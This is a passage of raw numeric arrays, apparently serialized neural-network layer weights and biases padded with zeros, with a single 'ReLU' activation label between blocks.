0.11566, 0.2595, 0.1757, 0.3894, -1.428, -2.084, -0.04752, 0.1794, 0.10364, 0.2825, -0.8613, 0.02226, -0.01575, -0.6055, 0.04062, -0.05667, -0.01817, -0.00612, 0.02496, -0.0539, 0.882], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.38, -0.3486, -0.702, -0.2385, -0.2174, -0.05966, 0.2795, 0.06137, -0.03308, 0.418, -0.0896, -0.7847, 0.1958, -0.02502, 0.2228, 0.2964, -0.03928, 0.4976, 0.04425, 0.02942, -0.01814, 0.973, -0.1631, 0.0766, 0.1704, 0.4192, -0.32, 0.4204, 0.6543, 0.1968, 0.3784, -0.19, -0.457, 0.01619, -0.2272, 0.02408, 0.1625, 0.1573, -0.0017605, 0.2676, 0.3647, 5.76e-05, 0.1602, 0.10486, -0.2805, -0.01227, -0.00936, -0.013695, -0.11633, 0.3372], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.04758, -0.705, 0.232, 0.541, 0.4585, -0.78, -3.455, -1.349, 0.03546, -1.455, 0.1404, 0.871, -0.7935, 
-0.02138, 0.4211, 0.3123, -0.00966, 0.636, -0.02454, 0.5415, -0.03168, 1.521, -1.079, -0.02118, -0.001586, -0.771, 0.9, -0.678, -0.2563, -0.1361, 1.923, 0.2712, -0.02353, 0.785, 1.777, -0.02133, -1.292, 0.8174, -1.845, 0.863, 0.582, 0.02676, 0.2233, -0.04706, 1.43, -0.02576, -0.0344, 0.711, 0.9946, -0.1313], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.3247, -0.2216, -0.4062, 0.10516, -0.1255, 0.1559, -0.2247, -0.07446, -0.04007, 0.3274, 0.09357, 0.1826, 0.12317, -0.01368, -0.005547, 0.793, 0.2715, -0.004883, -0.00786, -0.01538, 0.04163, 0.0902, 0.06287, 0.4053, 0.1268, 0.07, 0.2164, 0.2322, -0.0367, -0.1544, 0.3018, -0.558, 0.3123, -0.11017, -0.4382, -0.0028, 0.05585, -0.002409, -0.7144, 0.327, 0.05536, -0.01076, -0.5806, 0.3367, -0.763, -0.03152, 0.015175, 0.706, -0.10516, -0.149], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.2332, 0.598, 0.953, -0.0632, 0.149, 0.3171, 1.06, 0.1307, -0.02621, 0.9707, -0.5874, 0.2347, -1.939, 0.02888, 0.4775, 0.00294, -0.596, -0.641, -0.00851, -6.703, 0.04166, 0.8394, 0.7314, -0.1284, 0.1092, 0.002285, -0.12335, -0.3472, -0.0558, -0.1389, -0.6724, -0.4521, -0.1918, 0.757, -0.689, -0.00482, 0.5156, 0.9585, 0.403, -4.324, -0.6543, -0.03195, 0.1194, 0.5664, 1.279, -0.01119, -0.017, -0.8687, -0.707, 0.252], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.1554, -0.191, 0.3003, -0.696, -0.04227, -1.078, -1.011, -0.3608, 
0.02322, -0.0765, 0.4807, -0.5176, 0.12415, 0.00877, -0.2744, 0.53, -0.06323, 0.187, -0.04102, -0.2279, 0.03833, 0.4546, -2.207, 0.084, 0.03125, -0.1729, -0.03146, -0.3608, -0.07385, 0.2988, 0.4338, 0.03674, 0.02396, 0.933, -0.7964, -0.02739, 0.3147, 0.0851, -0.296, 0.4512, -0.528, -0.04825, -0.196, -0.3782, -0.12195, 0.00296, -0.03876, -3.059, -0.3726, -0.656], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.4617, 0.1313, -0.04257, 0.3748, -0.915, 0.3792, 0.003689, -0.1026, -0.04608, -0.2427, -0.1345, -0.1365, -0.001418, 0.01813, -0.09973, -0.4058, -0.7007, 0.991, 0.01636, 0.0455, 0.01433, 0.3445, -0.1099, -0.269, -0.0254, -0.3972, -1.223, 0.645, 0.03726, 0.2546, 0.0426, 0.12103, 0.923, -0.246, -0.2908, -0.02563, -0.1486, 0.0317, 0.3628, 0.1635, -1.365, 0.005154, -0.1362, 0.1024, 0.318, -0.004833, 0.03516, 1.308, -0.531, 0.3696], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.381, -0.07916, -0.049, -1.064, -0.1185, 0.0564, 0.9263, 0.3987, 0.005604, 0.2825, -0.1055, -0.2466, 0.694, 0.02861, -0.3599, -0.2375, 0.0874, -1.106, -0.01839, 0.00826, -0.00414, -0.0523, 0.544, 0.01842, 0.1202, -0.9106, 0.452, 0.1882, 0.4148, -0.1584, 0.2401, 0.1523, -0.007343, -0.2515, 0.1581, 0.03336, -0.0916, 0.3875, -0.408, 0.1293, 0.056, -0.02574, -0.343, 0.0711, 0.556, 0.01458, -0.002916, 1.654, 0.4243, -0.041]]
[0.333445, 0.32937, 0.404653, -0.921284, -0.329964, -1.82794, -0.0609542, -2.62039, 1.29905, 0.430929, -1.13653, 0.0242726, 0.139059, -2.15069, 0.465926, -1.02814, 0.384972, -1.55804, -0.0424164, -0.0173877, 0.688755, 0.45788, -0.544515, 0.103801, -0.00967208, -0.162685, -0.365785, -1.04445, 2.10269, -3.82108, -4.04447, -0.478207, -1.29071, 0.633645, -1.25998, 0.988992, -2.70079, -0.0321225, 0.197998, 0.671656, -0.0602532, -1.59659, -1.40148, -3.17843, -1.25713, 0.477901, -1.81706, 1.09953, -1.11851, -1.21469, 0.3335, 0.3293, 0.4045, -0.9214, -0.33, -1.828, -0.06094, -2.621, 1.299, 0.431, -1.137, 0.02428, 0.139, -2.15, 0.4658, -1.028, 0.385, -1.558, -0.04242, -0.0174, 0.689, 0.4578, -0.5444, 0.1038, -0.009674, -0.1627, -0.3657, -1.045, 2.104, -3.82, -4.043, -0.4783, -1.291, 0.634, -1.26, 0.989, -2.701, -0.03214, 0.198, 0.672, -0.06024, -1.597, -1.401, -3.178, -1.257, 0.4778, -1.817, 1.1, -1.118, -1.215]
ReLU
[[0.167685, 1.09312, 0.263226, -0.291381, 0.292082, -0.392743, 0.00552508, -0.248047, -0.0521225, 0.18915, 0.111934, 0.518227, 0.322147, -0.96541, 0.377765, -0.0485448, -0.36135, -0.29723, -0.40272, 0.0130533, 0.0586307, -0.147412, 0.278238, -0.0355259, 0.0374484, -0.176304, 0.665298, 0.45922, 0.151066, -0.142154, -0.314712, 0.164128, 0.389949, -0.544097, 0.221669, -0.476801, -0.310391, -0.00354713, 0.292965, 0.266164, 0.269099, -0.132948, 0.255949, 0.0800786, -0.0571545, -0.109944, 0.02507, 0.307336, 0.0293063, -0.110315, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-1.00369, 1.68887, -1.08955, -0.778672, -0.629387, 1.9431, 0.255514, -1.9942, -0.345986, 0.0854198, -2.63058, -0.022469, -0.790494, 1.71589, -0.313338, -0.558032, -0.0272906, -1.2291, -0.579189, 0.0166798, 0.456241, -1.25326, 0.221219, -1.20995, 0.0100253, -0.407857, 0.501173, -1.3935, 0.228023, -0.248732, 0.579598, 0.119808, -0.366925, 2.39497, 0.00252787, -0.488271, 0.348579, 0.0255068, 0.0342514, -0.712904, 0.0341286, 0.954069, 0.454144, -2.34672, 0.0899126, -1.3592, 1.06547, -0.478468, 0.469432, 0.146536, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.354638, -1.34062, -0.807383, -0.246766, 0.142697, 0.898577, 0.230978, 1.06982, -0.336711, 0.100806, -0.131796, 0.145726, -0.216204, 1.12131, -0.187531, 1.5723, -0.398188, 0.0185012, -0.0134581, -0.0217067, 0.0187364, -0.29955, 0.700615, 0.173631, 0.0207026, 0.445432, -0.101872, 0.0309654, 0.294081, 0.694449, -5.81642, -0.34403, 0.512093, 0.602536, 0.0326351, 0.189347, 0.230058, 0.0355673, 0.471882, -1.48714, -0.334473, -0.107627, 0.611081, 
-0.596013, -0.157325, 0.295609, -0.499445, -0.437181, -0.505419, 0.204727, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0981276, -4.01439, -4.01538, -1.02508, -2.7233, -3.4323, 0.164194, -2.83809, 1.18166, -2.97802, 1.49151, 0.945445, 0.0895877, 4.21248, 2.73609, 2.67625, 0.116389, -16.0378, -5.00794, 0.02148, -3.16851, 1.45503, -1.77117, -0.0307524, -0.0171075, 2.39026, 0.824409, 0.462742, -0.0203804, 1.52375, 1.41864, 1.31546, -0.937996, -5.23866, -2.3218, -0.563002, -3.25672, 0.0116683, -1.81782, -4.3764, -0.217214, -2.11835, -0.724478, 1.58288, -1.08776, 0.496041, 0.000333585, -2.67825, -1.59684, -1.53941, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.84655, 1.04445, 0.331494, 0.122932, 0.356896, -1.09766, -0.250201, -2.36606, 0.531876, 0.564043, -0.328188, -2.58002, 0.0218032, -2.2834, -0.248272, -1.02054, -0.46134, -1.31346, 1.25163, 0.00432597, -2.95697, 0.0993462, 0.818256, 2.8463, -0.0308824, 0.823178, -0.368611, -0.356445, 0.153112, 0.42696, -2.16425, -0.702152, 0.942929, 0.0133915, 0.33344, 0.526648, -2.26047, -0.00733395, -0.045398, 0.903595, 0.76068, -2.37762, 0.0191048, -0.742516, 1.05012, 0.523544, -0.233704, 0.0789711, 0.498782, 0.390608, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0204798, -0.516258, 0.580426, -0.108775, -0.0294453, -0.251101, -0.167089, -0.0297591, -0.293359, 0.0527287, 0.866282, 0.0471339, 0.373864, 0.0208759, 
-0.0056036, 0.262636, 0.0640093, -0.423169, 0.385045, 0.0185105, 0.268186, -0.135697, 0.0252595, -1.25734, -0.019402, -0.128896, 0.0714083, -0.0362569, -0.34226, -0.120863, -0.0253089, -0.381278, -0.053257, -0.291509, -0.618798, -0.216494, 0.752017, -0.00675978, -0.0835836, -0.175387, 0.202985, 0.0449615, 0.273019, -0.470096, -0.0598387, -0.00350449, -0.378555, -0.0491878, -0.910035, 0.0330585, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.246494, -0.000712129, 0.0311602, -0.381929, -0.200827, 0.0647095, 0.0434844, -0.263725, 0.0954817, -0.234808, -0.0848622, -0.206117, -0.269341, 0.573041, -0.043864, -0.112981, 0.0443333, -0.214051, 0.295684, 0.0465505, -0.020674, 0.0715898, -0.447092, -0.404371, 0.00690022, -0.11659, -0.406543, -0.257944, 0.0496564, -0.0137848, -0.154977, 0.0160314, -0.0787003, -0.308137, 0.227456, -0.00757121, 0.469689, -0.0470054, 0.237178, 0.0135662, -0.0856858, 0.0461834, 0.00550563, -0.960021, -0.112776, -0.150467, 0.170966, 0.192314, 0.0573785, 0.229288, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.197047, -0.153518, -0.0125794, -0.0477833, 0.068972, -0.0474614, 0.117495, 0.0128875, -0.121847, 0.0536297, 0.241619, -0.187346, -0.183347, -1.04566, -0.0708938, 0.300397, -0.0204781, -0.0518666, -0.0714642, 0.0453141, 0.423594, -0.132504, -0.375948, 0.355978, -0.0273414, 0.719783, -0.501527, 0.0861686, -0.0420574, -0.502339, 0.121336, -0.0316211, -0.234608, -0.425709, 0.137717, 0.236188, 1.22884, 0.00181691, -0.0362268, 0.23434, -0.211885, -0.143254, -0.110342, -0.881346, -0.163879, -0.565291, 0.0718393, -0.101421, 0.376246, 0.0830339, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.00789598, -0.733053, -0.0226453, 0.231737, -0.141265, 0.0827826, -0.0620344, 0.282346, 0.149078, -0.206358, 0.500899, -0.0344642, 0.154917, -0.232088, -0.607455, -0.146452, 0.321749, 0.440264, 0.217506, 0.0233071, 0.013215, -0.0340886, 0.59118, -0.268297, 0.0388567, 0.397463, -0.0250594, 0.151654, -0.215142, -0.177156, 0.015005, -0.476068, 0.0182334, 0.357134, 0.674414, -0.276294, -0.492011, -0.0369433, -0.153583, 0.111304, -0.135871, 0.303676, -0.00405505, -0.724108, -0.432811, 0.123632, -0.427753, -0.430669, 0.659992, 0.0148979, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0693761, -0.357176, -0.0797415, -0.158676, 0.14204, -0.0298882, -0.134102, 0.0268948, 0.0206018, -0.185926, -0.0913609, -0.189079, -0.107012, -0.0167323, 0.0714308, 0.0257175, 0.415612, 0.0166517, 0.349325, -0.0412902, 0.039886, 0.270389, -0.356209, 0.529296, 0.0333852, 0.106838, -0.0594988, -0.098233, -0.0584703, 0.163792, 0.0996626, -0.00914302, -0.24469, 0.156691, -0.203041, 0.119181, 0.498139, -0.014994, -0.690911, 0.116277, -0.00196221, 0.162171, -0.0892487, -0.442492, 0.015582, 0.315682, -0.231491, -0.149798, -0.0892529, 0.101254, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-1.22339, -2.68839, -0.519203, -2.80462, -0.993014, -0.265297, 1.09026, -0.690013, 0.685364, -0.849288, -0.16381, -0.393215, 0.101596, 1.02038, -1.6852, 
1.01947, -0.787809, -0.760237, -0.583119, -0.0143117, -1.24684, -0.40955, 1.3075, -2.42916, 0.020885, -0.398329, -0.641953, 0.0294926, -0.497639, -0.761427, -5.00074, 0.782252, 0.436154, 3.04533, -0.945523, 0.449528, 0.437962, -0.0103452, -0.391202, -1.79425, 0.280312, -0.0393485, 0.298487, -0.748474, 0.0558249, 0.253805, -0.301093, 0.609325, -0.271364, -0.223507, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-4.20876, -0.684176, -0.230743, -2.09924, -0.499029, -3.61524, 1.27089, -2.33781, -1.82012, 0.933621, -1.44955, -2.21276, 0.654091, 0.418064, -0.0253053, 2.97778, -0.372129, -0.645141, -3.74514, 0.0177461, -0.610389, -0.0563614, -0.989688, -4.31225, -0.0294937, -4.78708, -4.96542, 0.842135, -0.181514, -3.037, 3.05432, 2.17497, -4.63017, -10.4285, -3.57919, -2.25759, -1.03419, -0.0377308, -2.56582, 2.29424, 0.197125, -1.52575, -1.7303, 4.94213, -1.82644, -2.73157, -2.25971, -2.40859, -1.11505, -1.18792, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.249918, -1.08656, 0.378923, -0.562593, -0.312066, -0.576311, 0.209155, 0.00244219, 0.151212, 0.407298, -0.243347, -0.749584, -0.425578, 0.308535, -0.652123, 0.458826, 0.330694, -0.723906, -0.422123, -0.0426845, -0.135116, 0.876757, -0.194927, -0.581791, 0.0424122, -0.950447, -0.189755, -0.768671, -0.269587, -0.0754568, -0.0472668, -0.166764, -0.231022, 0.351272, 0.259054, -0.249117, -1.07043, -0.0023421, -0.598998, -1.08198, -0.671076, -1.53022, -0.341578, 2.37524, -0.0966744, 0.262587, 0.752239, -0.237116, -0.542827, 0.116894, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.00674895, -0.229818, -0.0175839, -0.118731, -0.234244, 0.247569, 0.260095, -2.3345, -0.0428092, -0.0685099, -0.214427, -0.0378763, -0.167792, 0.881419, 0.165781, 0.455659, 0.146957, 0.0363949, 0.433309, -0.0077839, -0.14684, 0.327915, -0.331645, 0.534779, -0.0142563, 0.110407, -0.115908, -0.42786, 0.0246931, -0.129287, -1.01882, 0.089287, 0.147827, -0.616439, 0.350328, -0.177992, -0.360015, -0.0143435, 0.144361, -0.451281, -0.431582, 0.285917, -0.220778, 1.60373, -0.344523, 0.00541664, 0.708998, 0.270904, 0.100541, 0.034953, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0923266, -0.407141, 0.197057, -0.013595, -0.529981, -0.600275, -0.120842, 0.517599, 0.139303, -0.430106, -0.454278, -0.641343, -0.662316, -0.0449787, -0.359693, 0.157745, 0.379568, -0.804902, 0.248097, -0.00230057, 0.433656, 0.170866, -0.985269, 0.195199, 0.0298499, -0.616322, -1.61455, -0.0156536, 0.429284, -0.139885, -0.732858, 0.252735, 0.403873, -0.838733, -0.722162, -0.120302, 0.427829, 0.0128434, 0.126833, -0.663246, 0.0320008, -1.02516, -0.214866, -4.712, -0.0424203, -0.300358, 0.460771, 0.402292, -0.522261, 0.0307216, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.513153, 1.87674, -0.702909, 0.129678, 0.638881, -5.28947, 0.0825905, -0.703459, -0.263171, -0.915148, -0.565958, -2.10075, -0.473493, 0.458121, 0.453908, 0.310553, -0.134655, -0.163983, 1.15887, 0.0393557, 0.106839, 0.0502907, -0.379662, -0.33524, 
-0.0159504, 0.196638, 0.378166, -0.918053, 0.685114, -5.58875, 3.46345, -0.153757, -0.921351, -0.246955, -0.813223, -0.423792, 0.169263, -0.021993, -2.17247, -0.283349, -0.120304, 0.0748003, -0.182503, 2.1628, -3.92516, -0.0765661, -3.94864, -0.651897, -0.0854622, -0.464569, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.214345, -0.382141, 0.37634, -3.68023, -0.358103, -1.32936, -0.535625, 2.04446, 0.695121, -0.950536, -0.225231, 0.6603, -0.511383, 1.51744, -0.112634, -0.715296, 0.282385, -0.428883, 1.18484, 0.0442013, 0.0367636, 0.660615, -0.34991, -0.812445, -0.0300554, 0.159718, -1.04101, 0.887628, 0.214568, -0.886221, -0.730467, -0.0765574, 0.18412, 0.562534, -2.24851, 0.112305, 1.11096, -0.02627, -0.0189851, -0.874775, -0.360283, -0.864944, -0.279414, 0.325281, -3.38665, 0.000313881, 0.375667, -0.121193, -3.2523, 0.449419, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0620325, -0.126943, 0.0133273, 0.615185, -0.508363, -0.232423, -0.0898317, -2.74409, -0.214322, -0.755572, 0.0282837, -0.47995, 0.107215, -0.563832, -0.161452, 0.016788, 0.338216, 0.957305, 0.565462, 0.0469783, 0.136064, 0.115123, -0.574386, -1.6869, 0.0277409, 0.408205, -0.512209, -0.12695, -0.162937, -0.67685, -0.123005, -0.0881579, 0.200769, 0.425819, 0.0965846, -0.0753018, -0.750421, -0.00707303, -0.39119, -0.0878193, 0.00597812, 0.587756, -0.00515508, -0.376093, 0.788013, 0.25268, 0.56158, -0.244684, 0.166959, -0.23878, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.215232, -0.332192, 0.581775, 0.849731, 0.232868, -0.384862, 0.454779, 1.06628, -1.53175, -0.437413, -0.000891389, -0.864052, 0.744251, -0.246933, -0.748211, -1.02875, -0.647682, 0.412396, 1.26901, -0.00890172, 0.760236, 0.0143065, -0.519666, -0.236022, 0.00326571, 0.219099, -1.03715, -0.58066, 0.133119, -0.46123, -1.72349, 0.440651, 0.589092, 0.00984484, 0.348521, -0.768334, -0.300325, -0.0240105, -0.644858, -3.92457, -0.0447785, -0.147626, -0.0905136, 0.566946, 0.828233, -0.524815, -0.719074, 0.230884, -1.19663, -1.16548, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 